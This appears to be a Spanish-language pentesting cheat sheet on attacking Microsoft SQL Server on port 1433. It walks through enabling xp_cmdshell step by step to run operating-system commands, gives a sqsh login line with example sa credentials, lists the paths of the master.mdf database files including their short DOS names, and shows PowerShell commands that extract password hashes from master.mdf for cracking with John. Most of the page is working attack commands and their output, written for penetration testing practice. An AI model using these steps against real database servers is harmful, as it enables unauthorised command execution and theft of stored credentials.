MSSQL

Microsoft SQL Server - Port 1433

Ejecución de comandos

###Formas de conseguir el xp_cmdshell ###
    1. try and see if it works
        xp_cmdshell 'whoami'
        go
############################
$ Si te sale lo siguiente pasa al sgte step 2:
Msg 15281, Level 16, State 1
Server '1NSIDER\SQLEXPRESS', Procedure 'xp_cmdshell', Line 1
SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system
administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell', search for 'xp_cmdshell' in SQL Server Books Online.
###########

    2. try to turn component back on
        EXEC SP_CONFIGURE 'xp_cmdshell' , 1
        reconfigure
        go
        xp_cmdshell 'whoami'
        go
############################
$ Si te sale lo siguiente pasa al sgte step 3:
Msg 15123, Level 16, State 1
Server '1NSIDER\SQLEXPRESS', Procedure 'SP_CONFIGURE', Line 62
The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
###########
    3. 'advanced' turn it back on
        EXEC SP_CONFIGURE 'show advanced options', 1
        reconfigure
        go
        EXEC SP_CONFIGURE 'xp_cmdshell' , 1
        reconfigure
        go
        xp_cmdshell 'whoami'
        go

Comandos útiles

sqsh -S 10.10.10.111 -U sa -P qwerty -D <Database> //Especificar -D es opcional

Rutas interesantes para un server con MSSQL

C:\Program Files\Microsoft SQL Server\SQL-VERSION\MSSQL\DATA\master.mdf
C:\Program Files\Microsoft SQL Server\SQL-VERSION\MSSQL\Backup\master.mdf
Example:
C:\Program Files\Microsoft SQL Server\MSSQL14.SQLEXPRESS\MSSQL\Backup\master.mdf
## 8.3 SFN utilizado por versiones anteriores de DOS
Una de las convenciones de nomenclatura de archivos es que el nombre es:
\PROGRA~1\MICROS~1\MSSQL1~1.SQL\MSSQL\DATA\master.mdf
\PROGRA~1\MICROS~1\MSSQL1~1.SQL\MSSQL\Backup\master.mdf
https://github.com/xpn/Powershell-PostExploitation
Add-Type -Path 'OrcaMDF.RawCore.dll'
Add-Type -Path 'OrcaMDF.Framework.dll'
## Wait momment
import-module .\Get-MDFHashes.ps1
Get-MDFHashes -mdf "C:\Users\admin\Desktop\master.mdf"
## John can then be used to crack the hash.
AnteriorCMSSiguienteMYSQL

Última actualización